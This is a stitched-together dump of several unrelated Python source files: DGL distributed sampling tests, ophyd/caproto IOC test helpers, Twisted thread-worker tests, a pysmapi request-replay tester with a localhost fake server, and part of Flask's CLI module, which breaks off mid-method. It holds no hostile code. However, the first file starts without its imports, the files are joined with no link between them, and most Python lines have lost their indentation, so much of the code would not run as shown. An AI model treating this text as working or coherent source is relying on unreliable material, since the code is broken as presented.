from dgl.distributed import DistGraphServer, DistGraph
def start_server(rank, tmpdir, disable_shared_mem, graph_name):
g = DistGraphServer(rank, "rpc_ip_config.txt", 1,
tmpdir / (graph_name + '.json'), disable_shared_mem=disable_shared_mem)
g.start()
def start_sample_client(rank, tmpdir, disable_shared_mem):
gpb = None
if disable_shared_mem:
_, _, _, gpb, _ = load_partition(tmpdir / 'test_sampling.json', rank)
dist_graph = DistGraph("rpc_ip_config.txt", "test_sampling", gpb=gpb)
sampled_graph = sample_neighbors(dist_graph, [0, 10, 99, 66, 1024, 2008], 3)
dgl.distributed.exit_client()
return sampled_graph
def check_rpc_sampling(tmpdir, num_server):
ip_config = open("rpc_ip_config.txt", "w")
for _ in range(num_server):
ip_config.write('{} 1\n'.format(get_local_usable_addr()))
ip_config.close()
g = CitationGraphDataset("cora")[0]
g.readonly()
print(g.idtype)
num_parts = num_server
num_hops = 1
partition_graph(g, 'test_sampling', num_parts, tmpdir,
num_hops=num_hops, part_method='metis', reshuffle=False)
pserver_list = []
ctx = mp.get_context('spawn')
for i in range(num_server):
p = ctx.Process(target=start_server, args=(i, tmpdir, num_server > 1, 'test_sampling'))
p.start()
time.sleep(1)
pserver_list.append(p)
time.sleep(3)
sampled_graph = start_sample_client(0, tmpdir, num_server > 1)
print("Done sampling")
for p in pserver_list:
p.join()
src, dst = sampled_graph.edges()
assert sampled_graph.number_of_nodes() == g.number_of_nodes()
assert np.all(F.asnumpy(g.has_edges_between(src, dst)))
eids = g.edge_ids(src, dst)
assert np.array_equal(
F.asnumpy(sampled_graph.edata[dgl.EID]), F.asnumpy(eids))
@unittest.skipIf(os.name == 'nt', reason='Do not support windows yet')
@unittest.skipIf(dgl.backend.backend_name == 'tensorflow', reason='Not support tensorflow for now')
def test_rpc_sampling():
import tempfile
os.environ['DGL_DIST_MODE'] = 'distributed'
with tempfile.TemporaryDirectory() as tmpdirname:
check_rpc_sampling(Path(tmpdirname), 2)
def check_rpc_sampling_shuffle(tmpdir, num_server):
ip_config = open("rpc_ip_config.txt", "w")
for _ in range(num_server):
ip_config.write('{} 1\n'.format(get_local_usable_addr()))
ip_config.close()
g = CitationGraphDataset("cora")[0]
g.readonly()
num_parts = num_server
num_hops = 1
partition_graph(g, 'test_sampling', num_parts, tmpdir,
num_hops=num_hops, part_method='metis', reshuffle=True)
pserver_list = []
ctx = mp.get_context('spawn')
for i in range(num_server):
p = ctx.Process(target=start_server, args=(i, tmpdir, num_server > 1, 'test_sampling'))
p.start()
time.sleep(1)
pserver_list.append(p)
time.sleep(3)
sampled_graph = start_sample_client(0, tmpdir, num_server > 1)
print("Done sampling")
for p in pserver_list:
p.join()
orig_nid = F.zeros((g.number_of_nodes(),), dtype=F.int64)
orig_eid = F.zeros((g.number_of_edges(),), dtype=F.int64)
for i in range(num_server):
part, _, _, _, _ = load_partition(tmpdir / 'test_sampling.json', i)
orig_nid[part.ndata[dgl.NID]] = part.ndata['orig_id']
orig_eid[part.edata[dgl.EID]] = part.edata['orig_id']
src, dst = sampled_graph.edges()
src = orig_nid[src]
dst = orig_nid[dst]
assert sampled_graph.number_of_nodes() == g.number_of_nodes()
assert np.all(F.asnumpy(g.has_edges_between(src, dst)))
eids = g.edge_ids(src, dst)
eids1 = orig_eid[sampled_graph.edata[dgl.EID]]
assert np.array_equal(F.asnumpy(eids1), F.asnumpy(eids))
# Also covers the non-shared-memory graph store case (num_server > 1).
@unittest.skipIf(os.name == 'nt', reason='Do not support windows yet')
@unittest.skipIf(dgl.backend.backend_name == 'tensorflow', reason='Not support tensorflow for now')
def test_rpc_sampling_shuffle():
import tempfile
os.environ['DGL_DIST_MODE'] = 'distributed'
with tempfile.TemporaryDirectory() as tmpdirname:
check_rpc_sampling_shuffle(Path(tmpdirname), 2)
check_rpc_sampling_shuffle(Path(tmpdirname), 1)
def check_standalone_sampling(tmpdir):
g = CitationGraphDataset("cora")[0]
g.readonly()
num_parts = 1
num_hops = 1
partition_graph(g, 'test_sampling', num_parts, tmpdir,
num_hops=num_hops, part_method='metis', reshuffle=False)
dist_graph = DistGraph(None, "test_sampling", conf_file=tmpdir / 'test_sampling.json')
sampled_graph = sample_neighbors(dist_graph, [0, 10, 99, 66, 1024, 2008], 3)
src, dst = sampled_graph.edges()
assert sampled_graph.number_of_nodes() == g.number_of_nodes()
assert np.all(F.asnumpy(g.has_edges_between(src, dst)))
eids = g.edge_ids(src, dst)
assert np.array_equal(
F.asnumpy(sampled_graph.edata[dgl.EID]), F.asnumpy(eids))
@unittest.skipIf(os.name == 'nt', reason='Do not support windows yet')
@unittest.skipIf(dgl.backend.backend_name == 'tensorflow', reason='Not support tensorflow for now')
def test_standalone_sampling():
import tempfile
os.environ['DGL_DIST_MODE'] = 'standalone'
with tempfile.TemporaryDirectory() as tmpdirname:
check_standalone_sampling(Path(tmpdirname))
def start_in_subgraph_client(rank, tmpdir, disable_shared_mem, nodes):
gpb = None
if disable_shared_mem:
_, _, _, gpb, _ = load_partition(tmpdir / 'test_in_subgraph.json', rank)
dist_graph = DistGraph("rpc_ip_config.txt", "test_in_subgraph", gpb=gpb)
sampled_graph = dgl.distributed.in_subgraph(dist_graph, nodes)
dgl.distributed.exit_client()
return sampled_graph
def check_rpc_in_subgraph(tmpdir, num_server):
ip_config = open("rpc_ip_config.txt", "w")
for _ in range(num_server):
ip_config.write('{} 1\n'.format(get_local_usable_addr()))
ip_config.close()
g = CitationGraphDataset("cora")[0]
g.readonly()
num_parts = num_server
partition_graph(g, 'test_in_subgraph', num_parts, tmpdir,
num_hops=1, part_method='metis', reshuffle=False)
pserver_list = []
ctx = mp.get_context('spawn')
for i in range(num_server):
p = ctx.Process(target=start_server, args=(i, tmpdir, num_server > 1, 'test_in_subgraph'))
p.start()
time.sleep(1)
pserver_list.append(p)
nodes = [0, 10, 99, 66, 1024, 2008]
time.sleep(3)
sampled_graph = start_in_subgraph_client(0, tmpdir, num_server > 1, nodes)
for p in pserver_list:
p.join()
src, dst = sampled_graph.edges()
g = dgl.as_heterograph(g)
assert sampled_graph.number_of_nodes() == g.number_of_nodes()
subg1 = dgl.in_subgraph(g, nodes)
src1, dst1 = subg1.edges()
assert np.all(np.sort(F.asnumpy(src)) == np.sort(F.asnumpy(src1)))
assert np.all(np.sort(F.asnumpy(dst)) == np.sort(F.asnumpy(dst1)))
eids = g.edge_ids(src, dst)
assert np.array_equal(
F.asnumpy(sampled_graph.edata[dgl.EID]), F.asnumpy(eids))
@unittest.skipIf(os.name == 'nt', reason='Do not support windows yet')
@unittest.skipIf(dgl.backend.backend_name == 'tensorflow', reason='Not support tensorflow for now')
def test_rpc_in_subgraph():
import tempfile
os.environ['DGL_DIST_MODE'] = 'distributed'
with tempfile.TemporaryDirectory() as tmpdirname:
check_rpc_in_subgraph(Path(tmpdirname), 2)
if __name__ == "__main__":
import tempfile
with tempfile.TemporaryDirectory() as tmpdirname:
os.environ['DGL_DIST_MODE'] = 'standalone'
check_standalone_sampling(Path(tmpdirname))
os.environ['DGL_DIST_MODE'] = 'distributed'
check_rpc_in_subgraph(Path(tmpdirname), 2)
check_rpc_sampling_shuffle(Path(tmpdirname), 1)
check_rpc_sampling_shuffle(Path(tmpdirname), 2)
check_rpc_sampling(Path(tmpdirname), 2)
check_rpc_sampling(Path(tmpdirname), 1)
|
utils.py
|
"""
Helpful functions that don't belong in a more specific submodule.
"""
import importlib
import logging
import os
import pkgutil
import signal
import uuid
from contextlib import contextmanager
from inspect import isclass, isfunction
from multiprocessing import Process
from ophyd.signal import EpicsSignalBase
logger = logging.getLogger(__name__)
_optional_err = ('Optional dependency caproto missing from python '
'environment. Cannot test server.')
try:
from caproto.server import PVGroup, pvproperty, run
has_caproto = True
except ImportError:
has_caproto = False
logger.debug(_optional_err)
def run_caproto_ioc(device_class, prefix):
"""
Runs a dummy caproto IOC.
Includes all the PVs that device_class will have if instantiated with
prefix.
Assumes only basic :class:`ophyd.Component` instances in the class
definition.
"""
if not has_caproto:
raise ImportError(_optional_err)
pvprops = {}
for suffix in yield_all_suffixes(device_class):
pvprops[suffix] = pvproperty()
DynIOC = type('DynIOC', (PVGroup,), pvprops)
ioc = DynIOC(prefix)
run(ioc.pvdb, module_name='caproto.asyncio.server',
interfaces=['0.0.0.0'])
def yield_all_suffixes(device_class):
"""
Iterates through all full pvname suffixes defined by device_class.
Assumes only basic :class:`ophyd.Component` instances in the class
definition.
"""
for walk in device_class.walk_components():
if issubclass(walk.item.cls, EpicsSignalBase):
suffix = get_suffix(walk)
yield suffix
def get_suffix(walk):
"""
Returns the full pvname suffix from a ComponentWalk instance.
This means everything after the top-level device's prefix.
Assumes that walk is an :class:`ophyd.signal.EpicsSignalBase`
subclass and that it was defined using only
:class:`ophyd.Component` in the device ancestors tree.
"""
suffix = ''
for cls, attr in zip(walk.ancestors, walk.dotted_name.split('.')):
suffix += getattr(cls, attr).suffix
return suffix
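# Editor's note (illustrative, hypothetical classes): for
#     class Motor(Device):
#         readback = Component(EpicsSignalRO, ':RBV')
#     class Stage(Device):
#         x = Component(Motor, ':X')
# the walk for Stage.x.readback has ancestors (Stage, Motor) and dotted_name
# 'x.readback', so get_suffix() returns ':X' + ':RBV' == ':X:RBV'.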
@contextmanager
def caproto_context(device_class, prefix):
"""
Yields a caproto process with all elements of the input device.
The caproto IOC will be run in a background process, making it suitable for
testing devices in the main process.
"""
if not has_caproto:
raise ImportError(_optional_err)
proc = Process(target=run_caproto_ioc, args=(device_class, prefix))
proc.start()
yield
if proc.is_alive():
os.kill(proc.pid, signal.SIGKILL)
def random_prefix():
"""Returns a random prefix to avoid test cross-talk."""
return str(uuid.uuid4())[:8] + ':'
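# Editor's sketch (assumption, not part of the original module): how the two
# helpers above might be combined in a test. ``MyDevice`` stands in for a real
# ophyd Device subclass and is resolved only if the sketch is actually called.
def _example_caproto_test(MyDevice):
    prefix = random_prefix()
    with caproto_context(MyDevice, prefix):
        device = MyDevice(prefix, name='device')
        device.wait_for_connection()
        assert device.connected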
def is_native(obj, module):
"""
Determines if obj was defined in module.
Returns True if obj was defined in this module.
Returns False if obj was not defined in this module.
Returns None if we can't figure it out, e.g. if this is a primitive type.
"""
try:
return module.__name__ in obj.__module__
except (AttributeError, TypeError):
return None
def get_native_functions(module):
"""Returns a set of all functions and methods defined in module."""
return get_native_methods(module, module)
def get_native_methods(cls, module, *, native_methods=None, seen=None):
"""Returns a set of all methods defined in cls that belong to module."""
if native_methods is None:
native_methods = set()
if seen is None:
seen = set()
for obj in cls.__dict__.values():
try:
if obj in seen:
continue
except TypeError:
# Unhashable type, definitely not a class or function
continue
seen.add(obj)
if not is_native(obj, module):
continue
elif isclass(obj):
get_native_methods(obj, module, native_methods=native_methods,
seen=seen)
elif isfunction(obj):
native_methods.add(obj)
return native_methods
def get_submodules(module_name):
"""Returns a list of the imported module plus all submodules."""
submodule_names = get_submodule_names(module_name)
return import_modules(submodule_names)
def get_submodule_names(module_name):
"""
Returns a list of the module name plus all importable submodule names.
"""
module = importlib.import_module(module_name)
submodule_names = [module_name]
try:
module_path = module.__path__
except AttributeError:
# This attr is missing if there are no submodules
return submodule_names
for _, submodule_name, is_pkg in pkgutil.walk_packages(module_path):
if submodule_name != '__main__':
full_submodule_name = module_name + '.' + submodule_name
submodule_names.append(full_submodule_name)
if is_pkg:
subsubmodule_names = get_submodule_names(full_submodule_name)
submodule_names.extend(subsubmodule_names)
return submodule_names
def import_modules(modules):
"""
Utility function to import an iterator of module names as a list.
Skips over modules that are not importable.
"""
module_objects = []
for module_name in modules:
try:
module_objects.append(importlib.import_module(module_name))
except ImportError:
pass
return module_objects
|
test_threadworker.py
|
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Tests for L{twisted._threads._threadworker}.
"""
import gc
import weakref
from twisted.trial.unittest import SynchronousTestCase
from threading import ThreadError, local
from .. import ThreadWorker, LockWorker, AlreadyQuit
class FakeQueueEmpty(Exception):
"""
L{FakeQueue}'s C{get} has exhausted the queue.
"""
class WouldDeadlock(Exception):
"""
If this were a real lock, you'd be deadlocked because the lock would be
double-acquired.
"""
class FakeThread:
"""
A fake L{threading.Thread}.
@ivar target: A target function to run.
@type target: L{callable}
@ivar started: Has this thread been started?
@type started: L{bool}
"""
def __init__(self, target):
"""
Create a L{FakeThread} with a target.
"""
self.target = target
self.started = False
def start(self):
"""
Set the "started" flag.
"""
self.started = True
class FakeQueue:
"""
A fake L{Queue} implementing C{put} and C{get}.
    @ivar items: A list of items placed by C{put} but not yet retrieved by
C{get}.
@type items: L{list}
"""
def __init__(self):
"""
Create a L{FakeQueue}.
"""
self.items = []
def put(self, item):
"""
Put an item into the queue for later retrieval by L{FakeQueue.get}.
@param item: any object
"""
self.items.append(item)
def get(self):
"""
Get an item.
@return: an item previously put by C{put}.
"""
if not self.items:
raise FakeQueueEmpty()
return self.items.pop(0)
class FakeLock:
"""
A stand-in for L{threading.Lock}.
@ivar acquired: Whether this lock is presently acquired.
"""
def __init__(self):
"""
Create a lock in the un-acquired state.
"""
self.acquired = False
def acquire(self):
"""
Acquire the lock. Raise an exception if the lock is already acquired.
"""
if self.acquired:
raise WouldDeadlock()
self.acquired = True
def release(self):
"""
Release the lock. Raise an exception if the lock is not presently
acquired.
"""
if not self.acquired:
raise ThreadError()
self.acquired = False
class ThreadWorkerTests(SynchronousTestCase):
"""
Tests for L{ThreadWorker}.
"""
def setUp(self):
"""
Create a worker with fake threads.
"""
self.fakeThreads = []
self.fakeQueue = FakeQueue()
def startThread(target):
newThread = FakeThread(target=target)
newThread.start()
self.fakeThreads.append(newThread)
return newThread
self.worker = ThreadWorker(startThread, self.fakeQueue)
def test_startsThreadAndPerformsWork(self):
"""
L{ThreadWorker} calls its C{createThread} callable to create a thread,
its C{createQueue} callable to create a queue, and then the thread's
target pulls work from that queue.
"""
self.assertEqual(len(self.fakeThreads), 1)
self.assertEqual(self.fakeThreads[0].started, True)
def doIt():
doIt.done = True
doIt.done = False
self.worker.do(doIt)
self.assertEqual(doIt.done, False)
self.assertRaises(FakeQueueEmpty, self.fakeThreads[0].target)
self.assertEqual(doIt.done, True)
def test_quitPreventsFutureCalls(self):
"""
L{ThreadWorker.quit} causes future calls to L{ThreadWorker.do} and
L{ThreadWorker.quit} to raise L{AlreadyQuit}.
"""
self.worker.quit()
self.assertRaises(AlreadyQuit, self.worker.quit)
self.assertRaises(AlreadyQuit, self.worker.do, list)
class LockWorkerTests(SynchronousTestCase):
"""
Tests for L{LockWorker}.
"""
def test_fakeDeadlock(self):
"""
The L{FakeLock} test fixture will alert us if there's a potential
deadlock.
"""
lock = FakeLock()
lock.acquire()
self.assertRaises(WouldDeadlock, lock.acquire)
def test_fakeDoubleRelease(self):
"""
The L{FakeLock} test fixture will alert us if there's a potential
double-release.
"""
lock = FakeLock()
self.assertRaises(ThreadError, lock.release)
lock.acquire()
self.assertEqual(None, lock.release())
self.assertRaises(ThreadError, lock.release)
def test_doExecutesImmediatelyWithLock(self):
"""
L{LockWorker.do} immediately performs the work it's given, while the
lock is acquired.
"""
storage = local()
lock = FakeLock()
worker = LockWorker(lock, storage)
def work():
work.done = True
work.acquired = lock.acquired
work.done = False
worker.do(work)
self.assertEqual(work.done, True)
self.assertEqual(work.acquired, True)
self.assertEqual(lock.acquired, False)
def test_doUnwindsReentrancy(self):
"""
If L{LockWorker.do} is called recursively, it postpones the inner call
until the outer one is complete.
"""
lock = FakeLock()
worker = LockWorker(lock, local())
levels = []
acquired = []
def work():
work.level += 1
levels.append(work.level)
acquired.append(lock.acquired)
if len(levels) < 2:
worker.do(work)
work.level -= 1
work.level = 0
worker.do(work)
self.assertEqual(levels, [1, 1])
self.assertEqual(acquired, [True, True])
def test_quit(self):
"""
L{LockWorker.quit} frees the resources associated with its lock and
causes further calls to C{do} and C{quit} to fail.
"""
lock = FakeLock()
ref = weakref.ref(lock)
worker = LockWorker(lock, local())
lock = None
self.assertIsNot(ref(), None)
worker.quit()
gc.collect()
self.assertIs(ref(), None)
self.assertRaises(AlreadyQuit, worker.quit)
self.assertRaises(AlreadyQuit, worker.do, list)
def test_quitWhileWorking(self):
"""
If L{LockWorker.quit} is invoked during a call to L{LockWorker.do}, all
recursive work scheduled with L{LockWorker.do} will be completed and
the lock will be released.
"""
lock = FakeLock()
ref = weakref.ref(lock)
worker = LockWorker(lock, local())
def phase1():
worker.do(phase2)
worker.quit()
self.assertRaises(AlreadyQuit, worker.do, list)
phase1.complete = True
phase1.complete = False
def phase2():
phase2.complete = True
phase2.acquired = lock.acquired
phase2.complete = False
worker.do(phase1)
self.assertEqual(phase1.complete, True)
self.assertEqual(phase2.complete, True)
self.assertEqual(lock.acquired, False)
lock = None
gc.collect()
self.assertIs(ref(), None)
def test_quitWhileGettingLock(self):
"""
If L{LockWorker.do} is called concurrently with L{LockWorker.quit}, and
C{quit} wins the race before C{do} gets the lock attribute, then
L{AlreadyQuit} will be raised.
"""
class RacyLockWorker(LockWorker):
@property
def _lock(self):
self.quit()
return self.__dict__["_lock"]
@_lock.setter
def _lock(self, value):
self.__dict__["_lock"] = value
worker = RacyLockWorker(FakeLock(), local())
self.assertRaises(AlreadyQuit, worker.do, list)
|
tester.py
|
#!/usr/bin/python3
# Copyright 2018-2019 Leland Lucius
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import errno
import fnmatch
import json
import os
import sys
import hexdump
import jsonpickle
import select
import socket
import socketserver
import threading
import traceback
from difflib import unified_diff as unified
import pysmapi as smapi
true = True
false = False
null = None
testhome = "tests"
conn = None
server_thread = None
server = None
ip = None
port = None
request = None
response = None
def set_hostinfo(hinfo):
global conn
conn = hinfo
def gentest(api, testname, expect=[(0,0)], **kwargs):
global testhome, conn
smapi.set_test(True)
if testname:
print(f"##### Generating {api} test: {testname}")
else:
print(f"##### Executing {api}")
# Get a reference to the target class
cls = getattr(globals()["smapi"], api)
# Create instance using keywords
try:
req1 = cls(**kwargs)
except Exception as e:
print(f"Creation using keywords failed: {e}")
traceback.print_exc()
quit()
# Create instance using setattr
try:
req2 = cls()
except Exception as e:
print(f"Creation using setattr failed: {e}")
traceback.print_exc()
quit()
# and set its attributes
try:
for key, val in kwargs.items():
setattr(req2, key, val)
if getattr(req1, key) != getattr(req2, key):
print(f"mismatch for: {key}")
print(f" keyword: {getattr(req1, key)}")
print(f" setattr: {getattr(req2, key)}")
quit()
except Exception as e:
print(f"setting attribute {key} failed: {e}")
traceback.print_exc()
quit()
# Convert the requests to json
res1 = json.dumps(json.loads(jsonpickle.encode(req1, unpicklable=False)), indent=1)
res2 = json.dumps(json.loads(jsonpickle.encode(req2, unpicklable=False)), indent=1)
# Compare the requests to ensure they were created the same
diff = "\n".join(unified(res1.split("\n"), res2.split("\n"), lineterm=""))
if len(diff) > 0:
print(f"Creation different between keyword and setattr methods")
print(diff)
quit()
# Execute request
try:
req1.request(conn)
except Exception as e:
print(f"Executing keyword method failed: {e}")
traceback.print_exc()
quit()
# Tell somebody that the test MAY not have ended properly
if (-1, -1) not in expect and \
(req1._return_code, -1) not in expect and \
(-1, req1._reason_code) not in expect and \
(req1._return_code, req1._reason_code) not in expect:
print(f"##### WARNING: rc={req1._return_code} rs={req1._reason_code}")
# Convert the post execution request to json
res = json.dumps(json.loads(jsonpickle.encode(req1, unpicklable=False)), indent=1)
# Save the results if a testname was provided
if testname:
# Generate the path and create the directories if needed
path = os.path.join(testhome, api)
if not os.path.exists(path):
os.makedirs(path)
path = os.path.join(path, testname + ".test")
# And finally write out the testcase
with open(path, "w") as f:
f.write(f"api = '{api}'\n")
f.write(f"kwargs = {kwargs}\n")
f.write(f"result = \\\n{res}\n")
return req1
class TestServer(socketserver.BaseRequestHandler):
def handle(self):
global request, response
# Receive the request
try:
received = self.recv(len(request))
#print("Received:")
#print(hexdump.hexdump(received, result="return"))
if received != request:
print("Received request doesn't match expected")
print("Expected:")
print(hexdump.hexdump(request, result="return"))
                print()
print("Received:")
print(hexdump.hexdump(received, result="return"))
return
except Exception as e:
traceback.print_exc()
return
# Make sure there's no more after the request
try:
received = self.recv(1)
print("Unexpected data received after request")
return True
except IOError as e:
if e.errno != errno.ETIMEDOUT:
traceback.print_exc()
return
# Send the response
self.request.sendall(response)
def recv(self, length, timeout=1):
buf = b""
while length > 0:
rlist, _, _ = select.select([self.request], [], [], timeout)
if len(rlist) == 0:
raise IOError(errno.ETIMEDOUT, f"Timed out waiting to receive {length} bytes")
read = self.request.recv(length)
if len(read) == 0:
raise IOError(errno.ENOTCONN, "Connection closed by remote")
buf += read
length -= len(read)
return buf
def start_server():
global server_thread, server, ip, port
server = socketserver.TCPServer(("localhost", 0), TestServer)
ip, port = server.server_address
server_thread = threading.Thread(target=server.serve_forever)
server_thread.daemon = True
server_thread.start()
set_hostinfo(smapi.HostInfo(host=ip,
port=port,
ssl=False,
userid="maint",
password="maint",
timeout=600))
def runtest(path):
global request, response
smapi.set_test(True)
# Extract the test name
testname = os.path.splitext(os.path.basename(path))[0]
# Pull in the test
testvars = {}
exec(open(path).read(), globals(), testvars)
# Copy in the variables
api = testvars["api"]
kwargs = testvars["kwargs"]
result = jsonpickle.decode(json.dumps(testvars["result"]))
print(f"##### Running {api} test: {testname}")
# Extract the original request and response
request = result["_send"]
response = result["_recv"]
# Get a reference to the target class
cls = getattr(globals()["smapi"], api)
# Create instance using keywords
try:
req1 = cls(**kwargs)
except Exception as e:
print(f"Creation using keywords failed: {e}")
traceback.print_exc()
quit()
# Create instance using setattr
try:
req2 = cls()
except Exception as e:
print(f"Creation using setattr failed: {e}")
traceback.print_exc()
quit()
# And set its attributes
try:
for key, val in kwargs.items():
setattr(req2, key, val)
if getattr(req1, key) != getattr(req2, key):
print(f"Mismatch for: {key}")
print(f" keyword: {getattr(req1, key)}")
print(f" setattr: {getattr(req2, key)}")
quit()
except Exception as e:
print(f"Setting attributes failed: {e}")
traceback.print_exc()
quit()
# Convert the requests to json
res1 = json.dumps(json.loads(jsonpickle.encode(req1, unpicklable=False)), indent=1)
res2 = json.dumps(json.loads(jsonpickle.encode(req2, unpicklable=False)), indent=1)
# Compare the requests to ensure they were created the same
diff = "\n".join(unified(res1.split("\n"), res2.split("\n"), lineterm=""))
if len(diff) > 0:
print(f"Creation different between keyword and setattr methods")
print(diff)
quit()
# Execute request
try:
req1.request(conn)
except Exception as e:
print(f"Test execution failed:: {e}")
traceback.print_exc()
quit()
# Convert the post execution request to json
res1 = json.dumps(json.loads(jsonpickle.encode(req1, unpicklable=False)), indent=1)
# Convert the captured result to json
res2 = json.dumps(json.loads(jsonpickle.encode(result, unpicklable=False)), indent=1)
# Compare the results to ensure they match
diff = "\n".join(unified(res1.split("\n"), res2.split("\n"), lineterm=""))
if len(diff) > 0:
print(f"Results different between keyword and setattr methods")
print(diff)
quit()
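# Editor's sketch (assumption, not part of the original file): a minimal driver
# that replays every saved <api>/<name>.test case under ``testhome`` against
# the local fake SMAPI server, optionally filtered by fnmatch patterns given on
# the command line.
if __name__ == "__main__":
    start_server()
    patterns = sys.argv[1:] or ["*"]
    for root, _, files in os.walk(testhome):
        for fname in sorted(files):
            if not fname.endswith(".test"):
                continue
            if not any(fnmatch.fnmatch(fname, pat) or fnmatch.fnmatch(fname, pat + ".test")
                       for pat in patterns):
                continue
            runtest(os.path.join(root, fname))
    server.shutdown()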
|
cli.py
|
import ast
import inspect
import os
import platform
import re
import sys
import traceback
from functools import update_wrapper
from operator import attrgetter
from threading import Lock
from threading import Thread
import click
from werkzeug.utils import import_string
from .globals import current_app
from .helpers import get_debug_flag
from .helpers import get_env
from .helpers import get_load_dotenv
try:
import dotenv
except ImportError:
dotenv = None
try:
import ssl
except ImportError:
ssl = None # type: ignore
class NoAppException(click.UsageError):
"""Raised if an application cannot be found or loaded."""
def find_best_app(module):
"""Given a module instance this tries to find the best possible
application in the module or raises an exception.
"""
from . import Flask
# Search for the most common names first.
for attr_name in ("app", "application"):
app = getattr(module, attr_name, None)
if isinstance(app, Flask):
return app
# Otherwise find the only object that is a Flask instance.
matches = [v for v in module.__dict__.values() if isinstance(v, Flask)]
if len(matches) == 1:
return matches[0]
elif len(matches) > 1:
raise NoAppException(
"Detected multiple Flask applications in module"
f" {module.__name__!r}. Use 'FLASK_APP={module.__name__}:name'"
f" to specify the correct one."
)
# Search for app factory functions.
for attr_name in ("create_app", "make_app"):
app_factory = getattr(module, attr_name, None)
if inspect.isfunction(app_factory):
try:
app = app_factory()
if isinstance(app, Flask):
return app
except TypeError as e:
if not _called_with_wrong_args(app_factory):
raise
raise NoAppException(
f"Detected factory {attr_name!r} in module {module.__name__!r},"
" but could not call it without arguments. Use"
f" \"FLASK_APP='{module.__name__}:{attr_name}(args)'\""
" to specify arguments."
) from e
raise NoAppException(
"Failed to find Flask application or factory in module"
f" {module.__name__!r}. Use 'FLASK_APP={module.__name__}:name'"
" to specify one."
)
def _called_with_wrong_args(f):
"""Check whether calling a function raised a ``TypeError`` because
the call failed or because something in the factory raised the
error.
:param f: The function that was called.
:return: ``True`` if the call failed.
"""
tb = sys.exc_info()[2]
try:
while tb is not None:
if tb.tb_frame.f_code is f.__code__:
# In the function, it was called successfully.
return False
tb = tb.tb_next
# Didn't reach the function.
return True
finally:
# Delete tb to break a circular reference.
# https://docs.python.org/2/library/sys.html#sys.exc_info
del tb
def find_app_by_string(module, app_name):
"""Check if the given string is a variable name or a function. Call
a function to get the app instance, or return the variable directly.
"""
from . import Flask
# Parse app_name as a single expression to determine if it's a valid
# attribute name or function call.
try:
expr = ast.parse(app_name.strip(), mode="eval").body
except SyntaxError:
raise NoAppException(
f"Failed to parse {app_name!r} as an attribute name or function call."
) from None
if isinstance(expr, ast.Name):
name = expr.id
args = []
kwargs = {}
elif isinstance(expr, ast.Call):
# Ensure the function name is an attribute name only.
if not isinstance(expr.func, ast.Name):
raise NoAppException(
f"Function reference must be a simple name: {app_name!r}."
)
name = expr.func.id
# Parse the positional and keyword arguments as literals.
try:
args = [ast.literal_eval(arg) for arg in expr.args]
kwargs = {kw.arg: ast.literal_eval(kw.value) for kw in expr.keywords}
except ValueError:
# literal_eval gives cryptic error messages, show a generic
# message with the full expression instead.
raise NoAppException(
f"Failed to parse arguments as literal values: {app_name!r}."
) from None
else:
raise NoAppException(
f"Failed to parse {app_name!r} as an attribute name or function call."
)
try:
attr = getattr(module, name)
except AttributeError as e:
raise NoAppException(
f"Failed to find attribute {name!r} in {module.__name__!r}."
) from e
# If the attribute is a function, call it with any args and kwargs
# to get the real application.
if inspect.isfunction(attr):
try:
app = attr(*args, **kwargs)
except TypeError as e:
if not _called_with_wrong_args(attr):
raise
raise NoAppException(
f"The factory {app_name!r} in module"
f" {module.__name__!r} could not be called with the"
" specified arguments."
) from e
else:
app = attr
if isinstance(app, Flask):
return app
raise NoAppException(
"A valid Flask application was not obtained from"
f" '{module.__name__}:{app_name}'."
)
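# Editor's note (illustrative): the strings accepted above include "app" (a
# plain variable), "create_app()" (a no-argument factory call) and
# "create_app('dev', debug=True)" (literal arguments only); anything else, such
# as attribute access or non-literal arguments, raises NoAppException.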
def prepare_import(path):
"""Given a filename this will try to calculate the python path, add it
to the search path and return the actual module name that is expected.
"""
path = os.path.realpath(path)
fname, ext = os.path.splitext(path)
if ext == ".py":
path = fname
if os.path.basename(path) == "__init__":
path = os.path.dirname(path)
module_name = []
# move up until outside package structure (no __init__.py)
while True:
path, name = os.path.split(path)
module_name.append(name)
if not os.path.exists(os.path.join(path, "__init__.py")):
break
if sys.path[0] != path:
sys.path.insert(0, path)
return ".".join(module_name[::-1])
def locate_app(module_name, app_name, raise_if_not_found=True):
__traceback_hide__ = True # noqa: F841
try:
__import__(module_name)
except ImportError as e:
# Reraise the ImportError if it occurred within the imported module.
# Determine this by checking whether the trace has a depth > 1.
if sys.exc_info()[2].tb_next:
raise NoAppException(
f"While importing {module_name!r}, an ImportError was raised."
) from e
elif raise_if_not_found:
raise NoAppException(f"Could not import {module_name!r}.") from e
else:
return
module = sys.modules[module_name]
if app_name is None:
return find_best_app(module)
else:
return find_app_by_string(module, app_name)
def get_version(ctx, param, value):
if not value or ctx.resilient_parsing:
return
import werkzeug
from . import __version__
click.echo(
f"Python {platform.python_version()}\n"
f"Flask {__version__}\n"
f"Werkzeug {werkzeug.__version__}",
color=ctx.color,
)
ctx.exit()
version_option = click.Option(
["--version"],
help="Show the flask version",
expose_value=False,
callback=get_version,
is_flag=True,
is_eager=True,
)
class DispatchingApp:
"""Special application that dispatches to a Flask application which
is imported by name in a background thread. If an error happens
it is recorded and shown as part of the WSGI handling which in case
of the Werkzeug debugger means that it shows up in the browser.
"""
def __init__(self, loader, use_eager_loading=None):
self.loader = loader
self._app = None
self._lock = Lock()
self._bg_loading_exc = None
if use_eager_loading is None:
use_eager_loading = os.environ.get("WERKZEUG_RUN_MAIN") != "true"
if use_eager_loading:
self._load_unlocked()
else:
self._load_in_background()
def _load_in_background(self):
def _load_app():
__traceback_hide__ = True # noqa: F841
with self._lock:
try:
self._load_unlocked()
except Exception as e:
self._bg_loading_exc = e
t = Thread(target=_load_app, args=())
t.start()
def _flush_bg_loading_exception(self):
__traceback_hide__ = True # noqa: F841
exc = self._bg_loading_exc
if exc is not None:
self._bg_loading_exc = None
raise exc
def _load_unlocked(self):
__traceback_hide__ = True # noqa: F841
self._app = rv = self.loader()
self._bg_loading_exc = None
return rv
def __call__(self, environ, start_response):
__traceback_hide__ = True # noqa: F841
